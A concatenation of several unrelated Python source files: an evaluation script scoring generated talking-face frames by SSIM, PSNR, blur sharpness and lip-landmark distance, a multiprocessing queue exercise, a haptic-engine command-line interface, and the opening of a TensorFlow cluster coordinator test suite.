sample_dir = config.sample_dir
test_data = []
print ('------------------------')
for i in range(1000):
tmp = {}
tmp["real_path"] = []
tmp["fake_path"] = []
for j in range(8):
real_path = os.path.join(sample_dir, 'single', 'real_%d.png'%(i*8+j))
fake_path = os.path.join(sample_dir, 'single', 'fake_%d.png'%(i*8+j))
if not os.path.exists(real_path):
print (real_path)
elif not os.path.exists(fake_path):
print (fake_path)
else:
tmp["real_path"].append(real_path)
tmp["fake_path"].append(fake_path)
test_data.append(tmp)
with open(os.path.join(config.pickle_path,'{}.pkl'.format(config.model_name)), 'wb') as handle:
pickle.dump(test_data, handle, protocol=pickle.HIGHEST_PROTOCOL)
def get_pickle_xface(csv_file, config):
_csv = open(csv_file,'rb')
reader = csv.reader(_csv)
test_data = []
for line in reader:
fid = line[2]
fimg_path = line[1].replace('.wav','_' + fid + '.jpg')
print (fimg_path)
rimg_path = line[0]
print (rimg_path)
tmp = {}
tmp["real_path"] = [rimg_path]
tmp["fake_path"] = [fimg_path]
test_data.append(tmp)
with open(os.path.join(config.pickle_path,'{}.pkl'.format(config.model_name)), 'wb') as handle:
pickle.dump(test_data, handle, protocol=pickle.HIGHEST_PROTOCOL)
##########################################################
def get_pickle_yousaidthat(csv_file, config):
_csv = open(csv_file,'rb')
reader = csv.reader(_csv)
test_data = []
for line in reader:
fid = line[6]
for i in range(1,30):
fimg_path = fid + 'fake_%03d.jpg'%i
rimg_path = fid + '%03d.jpg'%i
if not os.path.exists(fimg_path):
print (fimg_path)
continue
elif not os.path.exists(rimg_path):
print (rimg_path)
continue
else:
tmp = {}
tmp["real_path"] = [rimg_path]
tmp["fake_path"] = [fimg_path]
test_data.append(tmp)
with open(os.path.join(config.pickle_path,'{}.pkl'.format(config.model_name)), 'wb') as handle:
pickle.dump(test_data, handle, protocol=pickle.HIGHEST_PROTOCOL)
##################CPDB##############
def block_process(A, block):
block_contrast = np.zeros((A.shape[0]/block[0], A.shape[1]/block[1]), dtype=np.int32)
flatten_contrast = list()
for i in range(0, A.shape[0], block[0]):
for j in range(0, A.shape[1], block[1]):
block_view = A[i:i+block[0], j:j+block[1]]
block_view = np.max(block_view) - np.min(block_view)
flatten_contrast.append(block_view)
block_contrast = np.array(flatten_contrast).reshape(block_contrast.shape)
return block_contrast
def fspecial_gauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function
"""
x, y = numpy.mgrid[-size//2 + 1:size//2 + 1, -size//2 + 1:size//2 + 1]
g = numpy.exp(-((x**2 + y**2)/(2.0*sigma**2)))
return g/g.sum()
def ssim_ff(img1, img2, cs_map=False):
"""Return the Structural Similarity Map corresponding to input images img1
and img2 (images are assumed to be uint8)
This function attempts to mimic precisely the functionality of ssim.m a
MATLAB provided by the author's of SSIM
https://ece.uwaterloo.ca/~z70wang/research/ssim/ssim_index.m
"""
img1 = img1.astype(numpy.float64)
img2 = img2.astype(numpy.float64)
size = 11
sigma = 1.5
window = fspecial_gauss(size, sigma)
K1 = 0.01
K2 = 0.03
L = 255 #bitdepth of image
C1 = (K1*L)**2
C2 = (K2*L)**2
mu1 = signal.fftconvolve(window, img1, mode='valid')
mu2 = signal.fftconvolve(window, img2, mode='valid')
mu1_sq = mu1*mu1
mu2_sq = mu2*mu2
mu1_mu2 = mu1*mu2
sigma1_sq = signal.fftconvolve(window, img1*img1, mode='valid') - mu1_sq
sigma2_sq = signal.fftconvolve(window, img2*img2, mode='valid') - mu2_sq
sigma12 = signal.fftconvolve(window, img1*img2, mode='valid') - mu1_mu2
if cs_map:
return (((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*
(sigma1_sq + sigma2_sq + C2)),
(2.0*sigma12 + C2)/(sigma1_sq + sigma2_sq + C2))
else:
return ((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*
(sigma1_sq + sigma2_sq + C2))
def cpbd_compute(image):
if isinstance(image, str):
image = Image.open(image)
image = image.convert('L')
img = np.array(image, dtype=np.float32)
m, n = img.shape
threshold = 0.002
beta = 3.6
rb = 64
rc = 64
max_blk_row_idx = int(m/rb)
max_blk_col_idx = int(n/rc)
widthjnb = np.array([np.append(5 * np.ones((1, 51)), 3*np.ones((1, 205)))])
total_num_edges = 0
hist_pblur = np.zeros(101, dtype=np.float64)
input_image_canny_edge = feature.canny(img)
input_image_sobel_edge = matlab_sobel_edge(img)
width = marziliano_method(input_image_sobel_edge, img)
# print width
for i in range(1, max_blk_row_idx+1):
for j in range(1, max_blk_col_idx+1):
rows = slice(rb*(i-1), rb*i)
cols = slice(rc*(j-1), rc*j)
decision = get_edge_blk_decision(input_image_canny_edge[rows, cols], threshold)
if decision == 1:
local_width = width[rows, cols]
local_width = local_width[np.nonzero(local_width)]
blk_contrast = block_process(img[rows, cols], [rb, rc]) + 1
blk_jnb = widthjnb[0, int(blk_contrast)-1]
prob_blur_detection = 1 - math.e ** (-np.power(np.abs(np.true_divide(local_width, blk_jnb)), beta))
for k in range(1, local_width.size+1):
temp_index = int(round(prob_blur_detection[k-1] * 100)) + 1
hist_pblur[temp_index-1] = hist_pblur[temp_index-1] + 1
total_num_edges = total_num_edges + 1
if total_num_edges != 0:
hist_pblur = hist_pblur / total_num_edges
else:
hist_pblur = np.zeros(hist_pblur.shape)
sharpness_metric = np.sum(hist_pblur[0:63])
return sharpness_metric
def marziliano_method(E, A):
# print E
edge_with_map = np.zeros(A.shape)
gy, gx = np.gradient(A)
M, N = A.shape
angle_A = np.zeros(A.shape)
for m in range(1, M+1):
for n in range(1, N+1):
if gx[m-1, n-1] != 0:
angle_A[m-1, n-1] = math.atan2(gy[m-1,n-1], gx[m-1,n-1]) * (180/np.pi)
if gx[m-1, n-1] == 0 and gy[m-1, n-1] == 0:
angle_A[m-1, n-1] = 0
if gx[m-1, n-1] == 0 and gy[m-1, n-1] == np.pi/2:
angle_A[m-1, n-1] = 90
if angle_A.size != 0:
angle_Arnd = 45 * np.round(angle_A/45.0)
# print angle_Arnd
count = 0
for m in range(2, M):
for n in range(2, N):
if E[m-1, n-1] == 1:
if angle_Arnd[m-1, n-1] == 180 or angle_Arnd[m-1, n-1] == -180:
count += 1
for k in range(0, 101):
posy1 = n-1-k
posy2 = n - 2 - k
if posy2 <= 0:
break
if A[m-1, posy2-1] - A[m-1, posy1-1] <= 0:
break
width_count_side1 = k + 1
for k in range(0, 101):
negy1 = n + 1 + k
negy2 = n + 2 + k
if negy2 > N:
break
if A[m-1, negy2-1] > A[m-1, negy1-1]:
break
width_count_side2 = k + 1
edge_with_map[m-1, n-1] = width_count_side1 + width_count_side2
elif angle_Arnd[m-1, n-1] == 0:
count += 1
for k in range(0, 101):
posy1 = n+1+k
posy2 = n + 2 + k
if posy2 > N:
break
# print m, posy2
if A[m-1, posy2-1] <= A[m-1, posy1-1]:
break
width_count_side1 = k + 1
for k in range(0, 101):
negy1 = n -1-k
negy2 = n -2 -k
if negy2 <=0:
break
if A[m-1, negy2-1] >= A[m-1, negy1-1]:
break
width_count_side2 = k + 1
edge_with_map[m-1, n-1] = width_count_side1 + width_count_side2
return edge_with_map
def get_edge_blk_decision(im_in, T):
m, n = im_in.shape
L = m * n
im_edge_pixels = np.sum(im_in)
im_out = im_edge_pixels > (L * T)
return im_out
def matlab_sobel_edge(img):
mask = np.array([[1, 0, -1], [2, 0, -2], [1, 0, -1]]) / 8.0
bx = correlate(img, mask)
b = bx*bx
# print b
b = b > 4.0
return np.array(b, dtype=np.int)
################################################################################################
def generating_landmark_lips(test_inf):
# image = cv2.imread(os.path.join(config.sample_dir,'bg.jpg'))
# image_real = image.copy()
# image_fake = image.copy()
# original = np.array([181,237])
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('../basics/shape_predictor_68_face_landmarks.dat')
for inx in range(len(test_inf)):
real_paths = test_inf[inx]["real_path"]
fake_paths = test_inf[inx]["fake_path"]
# print len(real_paths)
print ("{}/{}".format(inx, len(test_inf)))
for i in range(len(real_paths)):
rp = real_paths[i]
fp = fake_paths[i]
# print fp
temp_r = rp.split('/')
# temp_f = fp.split('/')
if not os.path.exists( os.path.join(config.sample_dir,'landmark/real64/' + temp_r[-2])):
os.mkdir( os.path.join(config.sample_dir,'landmark/real64/' + temp_r[-2]))
if not os.path.exists(os.path.join(config.sample_dir,'landmark/fake64/' + temp_r[-2])):
os.mkdir(os.path.join(config.sample_dir,'landmark/fake64/' + temp_r[-2]))
lm_r = os.path.join(config.sample_dir,'landmark/real64/' + temp_r[-2] + '/' + temp_r[-1][:-4] + '.npy' )
lm_f = os.path.join(config.sample_dir,'landmark/fake64/' + temp_r[-2] + '/' + temp_r[-1][:-4] + '.npy' )
i_lm_r = os.path.join(config.sample_dir,'landmark/real64/' + temp_r[-2] + '/' + temp_r[-1][:-4] + '.jpg' )
i_lm_f = os.path.join(config.sample_dir,'landmark/fake64/' + temp_r[-2] + '/' + temp_r[-1][:-4] + '.jpg' )
image_real = cv2.imread(rp)
image_fake = cv2.imread(fp)
# image_real[237:301,181:245,:] = real_mask
# image_fake[237:301,181:245,:] = fake_mask
real_gray = cv2.cvtColor(image_real, cv2.COLOR_BGR2GRAY)
real_rects = detector(real_gray, 1)
fake_gray = cv2.cvtColor(image_fake,cv2.COLOR_BGR2GRAY)
fake_rects = detector(fake_gray, 1)
if real_rects is None or fake_rects is None:
print '--------------------------------'
for (i,rect) in enumerate(fake_rects):
shape = predictor(fake_gray, rect)
shape = face_utils.shape_to_np(shape)
for (name, (i, j)) in face_utils.FACIAL_LANDMARKS_IDXS.items():
# print name
if name != 'mouth':
continue
clone = image_fake.copy()
for (x, y) in shape[i:j]:
cv2.circle(clone, (x, y), 1, (0, 255, 0), -1)
cv2.imwrite(i_lm_f, clone)
mouth_land = shape[i:j].copy()
original = np.sum(mouth_land,axis=0) / 20.0
# print (mouth_land)
mouth_land = mouth_land - original
np.save(lm_f,mouth_land)
for (i,rect) in enumerate(real_rects):
shape = predictor(real_gray, rect)
shape = face_utils.shape_to_np(shape)
for (name, (i, j)) in face_utils.FACIAL_LANDMARKS_IDXS.items():
# print name
if name != 'mouth':
continue
clone = image_real.copy()
for (x, y) in shape[i:j]:
cv2.circle(clone, (x, y), 1, (0, 255, 0), -1)
cv2.imwrite(i_lm_r, clone)
mouth_land = shape[i:j].copy()
original = np.sum(mouth_land,axis=0) / 20.0
# print (mouth_land)
mouth_land = mouth_land - original
np.save(lm_r,mouth_land)
def generate_landmarks(pickle_path):
num_thread = config.num_thread
test_inf = pickle.load(open(pickle_path, "rb"))
datas = []
batch_size = len(test_inf)/num_thread
temp = []
if not os.path.exists( os.path.join(config.sample_dir,'landmark')):
os.mkdir( os.path.join(config.sample_dir,'landmark'))
if not os.path.exists( os.path.join(config.sample_dir,'landmark/real64')):
os.mkdir( os.path.join(config.sample_dir,'landmark/real64'))
if not os.path.exists( os.path.join(config.sample_dir,'landmark/fake64')):
os.mkdir( os.path.join(config.sample_dir,'landmark/fake64'))
for i,d in enumerate(test_inf):
temp.append(d)
if (i+1) % batch_size ==0:
datas.append(temp)
temp = []
for i in range(num_thread):
process = multiprocessing.Process(target = generating_landmark_lips,args = (datas[i],))
process.start()
def compare_landmarks(path, config):
fake_path = os.path.join(path + 'fake64')
real_path = os.path.join(path + 'real64')
# fakes = os.walk(fake_path)
rps = []
fps = []
for video in os.listdir(fake_path):
for name in os.listdir( os.path.join(fake_path, video) ):
if name[-3:] == 'npy':
if os.path.exists(os.path.join(real_path , video, name)):
rps.append(os.path.join(real_path , video, name))
fps.append(os.path.join(fake_path , video, name))
# for root, dirs, files in os.walk(fake_path):
# for name in files:
# # print name
# if name[-3:] == 'npy':
# print ('===')
# print (os.path.join(root, name))
# fps.append(os.path.join(root, name))
# rps.append(real_path + '/' + config.model_name + '/' + name)
# fps.append(fake_path + '/' +config.model_name + '/' + name)
# for root, dirs, files in os.walk(real_path):
# for name in files:
# # print name
# if name[-3:] == 'npy':
# # print ('=++=')
# # print (os.path.join(root, name))
# rps.append(os.path.join(root, name))
print (len(rps))
print (len(fps))
dis_txt = open(path + 'distance.txt','w')
distances = []
# print len(rps)
for inx in range(len(rps)):
# try:
rp = np.load(rps[inx])
fp = np.load(fps[inx])
# print rp.shape
# print fp.shape
dis = (rp-fp)**2
dis = np.sum(dis,axis=1)
dis = np.sqrt(dis)
dis = np.sum(dis,axis=0)
distances.append(dis)
dis_txt.write(rps[inx] + '\t' + str(dis) + '\n')
# except:
# continue
average_distance = sum(distances) / len(rps)
print average_distance
def psnr_f(img1, img2):
mse = np.mean( (img1 - img2) ** 2 )
if mse == 0:
return 100
PIXEL_MAX = 255.0
return 20 * math.log10(PIXEL_MAX / math.sqrt(mse))
def compare_ssim(pickle_path):
test_inf = pickle.load(open(pickle_path, "rb"))
dis_txt = open(config.sample_dir + 'ssim.txt','w')
ssims = []
# msssims = []
psnrs =[]
for i,d in enumerate(test_inf):
print (i)
# try:
fake_paths = d['fake_path']
real_paths = d['real_path']
for inx in range(len(fake_paths)):
f_i = cv2.imread(fake_paths[inx])
r_i = cv2.imread(real_paths[inx])
r_i = cv2.resize(r_i, (256,256), interpolation = cv2.INTER_AREA)
f_i = cv2.resize(f_i, (256,256), interpolation = cv2.INTER_AREA)
ssim = ssim_f(f_i,r_i,multichannel=True)
f_i = cv2.cvtColor(f_i, cv2.COLOR_BGR2GRAY)
r_i = cv2.cvtColor(r_i, cv2.COLOR_BGR2GRAY)
psnr = psnr_f(f_i,r_i)
# msssim = msssim_f(f_i,r_i)
psnrs.append(psnr)
ssims.append(ssim)
# print "ssim: {:.4f},\t psnr: {:.4f}\t msssim: {:.4f}".format( ssim, psnr,ssim)
dis_txt.write(fake_paths[inx] + "\t ssim: {:.4f},\t psnr: {:.4f}\t msssim: {:.4f}".format( ssim, psnr,ssim) + '\n')
# except:
# print ('gggg')
# continue
average_ssim = sum(ssims) / len(ssims)
average_psnr = sum(psnrs) / len(psnrs)
# average_msssim = sum(msssims) / len(msssims)
print "Aeverage: \t ssim: {:.4f},\t psnr: {:.4f}".format( average_ssim, average_psnr,average_ssim)
return average_ssim, average_psnr
def compare_cpdb(pickle_path):
test_inf = pickle.load(open(pickle_path, "rb"))
dis_txt = open(config.sample_dir + 'cpdb.txt','w')
r_cpdb = []
f_cpdb = []
for i,d in enumerate(test_inf):
fake_paths = d['fake_path']
# real_paths = d['real_path']
for inx in range(len(fake_paths)):
# real_cpdb = cpbd_compute(real_paths[inx])
fake_cpdb = cpbd_compute(fake_paths[inx])
# r_cpdb.append(real_cpdb)
f_cpdb.append(fake_cpdb)
dis_txt.write(fake_paths[inx] + '\t fake: {:.4f}'.format( fake_cpdb) + '\n')
# average_r = sum(r_cpdb) / len(r_cpdb)
average_f = sum(f_cpdb) / len(f_cpdb)
print "Aeverage: \t fake: {:.4f}".format( average_f)
return average_f
def main(config):
# _sample( config)
get_pickle(config)
# get_pickle_xface('/u/lchen63/data/mat/test.csv', config)
# get_pickle_yousaidthat('/u/lchen63/data/mat/test_yousaidthat.csv', config)
p = os.path.join( config.pickle_path,'{}.pkl'.format(config.model_name))
# average_ssim, average_psnr = compare_ssim(p)
#generate_landmarks(p)
# average_f = compare_cpdb(p)
compare_landmarks(os.path.join(config.sample_dir ,'landmark/'), config)
# print "Aeverage: \t fake: {:.4f}".format( average_f)
# print "Aeverage: \t ssim: {:.4f},\t psnr: {:.4f}".format( average_ssim, average_psnr)
if __name__ == "__main__":
config = parse_args()
config.sample_dir = os.path.join(config.sample_dir, config.model_name)
# config.pickle_path = os.path.join(config.pickle_path, config.model_name)
main(config)
|
13_exercise_19.py
|
# -*- coding: utf-8 -*-
from multiprocessing import Process, Queue
import os, time, random
# 写数据进程执行的代码:
def write(q):
print('Process to write: %s' % os.getpid())
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# 读数据进程执行的代码:
def read(q):
print('Process to read: %s' % os.getpid())
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__=='__main__':
# 父进程创建Queue,并传给各个子进程:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
# 启动子进程pw,写入:
pw.start()
# 启动子进程pr,读取:
pr.start()
# 等待pw结束:
pw.join()
# pr进程里是死循环,无法等待其结束,只能强行终止:
pr.terminate()
|
hapticenginge_interface.py
|
#!/usr/bin/python3
import argparse
import os
import sys
myfolder = os.path.dirname(os.path.abspath(__file__))
lib_path = os.path.join(myfolder, "../lib/")
sys.path.append(lib_path)
import haptic_engine_core
import subprocess
import time
import threading
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--up", action='store_true', help="HapticEngine UP signel")
parser.add_argument("-d", "--down", action='store_true', help="HapticEngine DOWN signel")
parser.add_argument("-s", "--soft", action='store_true', help="HapticEngine SOFT signel")
parser.add_argument("-t", "--tap", action='store_true', help="HapticEngine TAP signel")
parser.add_argument("-dt", "--doubletap", action='store_true', help="HapticEngine DoubleTAP signel")
parser.add_argument("-sn", "--snooze", action='store_true', help="HapticEngine SNOOZE signel")
args = parser.parse_args()
up = args.up
down = args.down
soft = args.soft
tap = args.tap
doubletap = args.doubletap
snooze = args.snooze
hapt = None
def init_haptic_engine_object():
global hapt
hapt = haptic_engine_core.HapticEngine()
def run_interface(option=None):
if up or option == "up":
th = threading.Thread(target=hapt.UP())
th.start()
if down or option == "down":
th = threading.Thread(target=hapt.DOWN())
th.start()
if soft or option == "soft":
th = threading.Thread(target=hapt.SOFT())
th.start()
if tap or option == "tap":
th = threading.Thread(target=hapt.TAP())
th.start()
if doubletap or option == "doubletap":
th = threading.Thread(target=hapt.DoubleTAP())
th.start()
if snooze or option == "snooze":
th = threading.Thread(target=hapt.SNOOZE())
th.start()
init_haptic_engine_object()
if __name__ == "__main__":
run_interface()
|
cluster_coordinator_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for coordinator.py."""
import collections
import contextlib
import functools
import gc
import os
import platform
import sys
import threading
import time
import traceback
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import parameter_server_strategy_v2
from tensorflow.python.distribute.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.coordinator import cluster_coordinator as coordinator_lib
from tensorflow.python.distribute.coordinator import values as values_lib
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.training.server_lib import ClusterSpec
class ClosureWithOutput(coordinator_lib.Closure):
def __init__(self, function, cancellation_mgr=None, args=None, kwargs=None):
super(ClosureWithOutput, self).__init__(
function, cancellation_mgr=cancellation_mgr, args=args, kwargs=kwargs)
self.output_remote_value = self.build_output_remote_value()
class CoordinatedClosureQueueTest(test.TestCase):
def testBasic(self):
queue = coordinator_lib._CoordinatedClosureQueue()
closure1 = self._create_closure(queue._cancellation_mgr)
queue.put(closure1)
self.assertIs(closure1, queue.get())
self.assertFalse(queue.done())
queue.put_back(closure1)
self.assertEqual(closure1, queue.get())
queue.mark_finished()
self.assertTrue(queue.done())
queue.wait()
def testProcessAtLeaseOnce(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
labels = ['A', 'B', 'C', 'D', 'E']
processed_count = collections.defaultdict(int)
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
has_been_put_back = False
while True:
closure = closure_queue.get(timeout=30)
if closure is None:
break
if not has_been_put_back:
has_been_put_back = True
closure_queue.put_back(closure)
continue
closure._function()
closure_queue.mark_finished()
def get_func(label):
def func():
time.sleep(3)
processed_count[label] += 1
return func
cm = cancellation.CancellationManager()
for label in labels:
closure_queue.put(ClosureWithOutput(get_func(label), cm))
t1 = threading.Thread(target=process_queue, daemon=True)
t1.start()
t2 = threading.Thread(target=process_queue, daemon=True)
t2.start()
# Make sure multiple wait() calls are fine.
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
self.assertEqual(processed_count, collections.Counter(labels))
coord.join([t1, t2])
def testNotifyBeforeWait(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
def func():
logging.info('func running')
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
closure_queue.get()
closure_queue.mark_finished()
closure_queue.put(ClosureWithOutput(func, closure_queue._cancellation_mgr))
t = threading.Thread(target=process_queue)
t.start()
coord.join([t])
# This test asserts that waiting at the time the function has been processed
# doesn't time out.
closure_queue.wait()
def _assert_one_unblock_the_other(self, first_fn, second_fn):
"""Asserts `second_fn` wouldn't return before `first_fn` is finished."""
first_fn_done = threading.Event()
second_fn_done = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def wrapped_first_fn():
with coord.stop_on_exception():
self.assertFalse(second_fn_done.is_set())
first_fn()
first_fn_done.set()
self.assertFalse(first_fn_done.is_set())
t = threading.Thread(target=wrapped_first_fn)
t.start()
second_fn()
self.assertTrue(first_fn_done.is_set())
second_fn_done.set()
coord.join([t])
def testWaitRaiseErrorAfterMarkFailure(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue = coordinator_lib._CoordinatedClosureQueue()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure = closure_queue.get()
wait_finish_event = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
# Using a thread to verify that closure_queue.wait() will not return until
# all inflight closures are finished.
def mark_finished_fn():
try:
raise ValueError('Some error.')
except ValueError as e:
closure_queue.mark_failed(e)
def wait_fn():
with self.assertRaises(ValueError):
closure_queue.wait()
self._assert_one_unblock_the_other(mark_finished_fn, wait_fn)
self.assertTrue(closure_queue.done())
def _create_closure(self, cancellation_mgr):
@def_function.function()
def some_function():
return 1.0
return ClosureWithOutput(some_function, cancellation_mgr)
def _put_two_closures_and_get_one(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
closure1 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure1)
closure2 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure2)
closure_got = closure_queue.get() # returns closure1
self.assertIs(closure_got, closure1)
self.assertIsNot(closure_got, closure2)
return closure_queue, closure1, closure2
def testPutRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2.output_remote_value.fetch()
# The error is cleared.
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
def testWaitRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.wait()
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2.output_remote_value.fetch()
# The error is cleared.
closure_queue.wait()
def testDoneRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertFalse(closure_queue.done())
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.done()
def _set_error(self, closure_queue, closure, error):
try:
raise error
except Exception as e: # pylint: disable=broad-except
closure.output_remote_value._set_error(e)
closure_queue.mark_failed(e)
def _test_cancel_closure_when_error(self, call_wait):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, closure1, closure2 = self._put_two_closures_and_get_one()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure_queue.get()
# At this moment, there are two inflight, one in queue.
self.assertEqual(closure_queue._inflight_closure_count, 2)
# Hold a copy of the queue's cancellation manager at this point
initial_cm = closure_queue._cancellation_mgr
# Simulating closure1 fails.
self._set_error(closure_queue, closure1, ValueError('Some error.'))
# At this moment, there are one inflight, one in queue.
self.assertEqual(closure_queue._queue.qsize(), 1)
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure3 = self._create_closure(closure_queue._cancellation_mgr)
def fake_cancellation():
self._set_error(closure_queue, closure2,
ValueError('Fake cancellation error.'))
def report_error():
# It should not report the fake cancellation error.
with self.assertRaisesRegex(ValueError, 'Some error.'):
# Verifying `wait()` or `put()` raises even if one closure is in
# flight.
if call_wait:
closure_queue.wait()
else:
closure_queue.put(closure3)
self._assert_one_unblock_the_other(fake_cancellation, report_error)
# The original cancellation manager of the queue has been cancelled.
self.assertTrue(initial_cm.is_cancelled)
# At this moment, there is zero inflight, nothing in queue.
self.assertTrue(closure_queue._queue.empty())
self.assertEqual(closure_queue._inflight_closure_count, 0)
self.assertIsNone(closure_queue._error)
# This asserts that closure1 has errored.
with self.assertRaisesRegex(ValueError, 'Some error.'):
closure1.output_remote_value.fetch()
# The following asserts that closure3 should have been cancelled.
if not call_wait:
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure3.output_remote_value.fetch()
# Closure2 was an inflight closure when it got cancelled.
self.assertEqual(closure2.output_remote_value._status,
values_lib.RemoteValueStatus.READY)
with self.assertRaisesRegex(ValueError, 'Fake cancellation error.'):
closure2.output_remote_value.fetch()
# This asserts that the queue has a clear state.
self.testBasic()
def testWaitRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=True)
def testPutRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=False)
def testStateIsRestoredAfterJoinIsCalled(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure_queue.mark_failed(ValueError('test error'))
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
# Its error should have been cleared.
self.assertIsNone(closure_queue._error)
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertIsNone(closure_queue._error)
def testThreadSafey(self):
thread_count = 10
queue = coordinator_lib._CoordinatedClosureQueue()
# Each thread performs 20 queue actions: 10 are `put_back` and 10 are
# `mark_finished`.
action_count = 20
def func():
for i in range(action_count):
closure = queue.get()
if i % 2 == 0:
queue.put_back(closure)
else:
queue.mark_finished()
threads = [threading.Thread(target=func) for i in range(thread_count)]
for t in threads:
t.start()
for _ in range(thread_count * action_count // 2):
queue.put(self._create_closure(queue._cancellation_mgr))
queue.wait()
self.assertTrue(queue.done())
class ErrorReportingThread(threading.Thread):
error = None
def __init__(self, *args, **kwargs):
assert 'target' in kwargs
target = kwargs['target']
@functools.wraps(target)
def wrapped_target(*args, **kwargs):
try:
return target(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
traceback.print_exception(*sys.exc_info())
ErrorReportingThread.error = e
kwargs['target'] = wrapped_target
super(ErrorReportingThread, self).__init__(*args, **kwargs)
class TestCaseWithErrorReportingThread(test.TestCase):
@classmethod
def setUpClass(cls):
cls._threading_thread = threading.Thread
threading.Thread = ErrorReportingThread
super(TestCaseWithErrorReportingThread, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestCaseWithErrorReportingThread, cls).tearDownClass()
threading.Thread = cls._threading_thread
def setUp(self):
ErrorReportingThread.error = None
super(TestCaseWithErrorReportingThread, self).setUp()
def tearDown(self):
super(TestCaseWithErrorReportingThread, self).tearDown()
if ErrorReportingThread.error:
raise ErrorReportingThread.error # pylint: disable=raising-bad-type
def make_coordinator(num_workers, num_ps):
# TODO(rchao): Test the internal rpc_layer version.
cluster_def = multi_worker_test_base.create_in_process_cluster(
num_workers=num_workers, num_ps=num_ps, rpc_layer='grpc')
cluster_def['chief'] = [
'localhost:%d' % multi_worker_test_base.pick_unused_port()
]
cluster_resolver = SimpleClusterResolver(
ClusterSpec(cluster_def), rpc_layer='grpc')
strategy = parameter_server_strategy_v2.ParameterServerStrategyV2(
cluster_resolver)
return coordinator_lib.ClusterCoordinator(strategy)
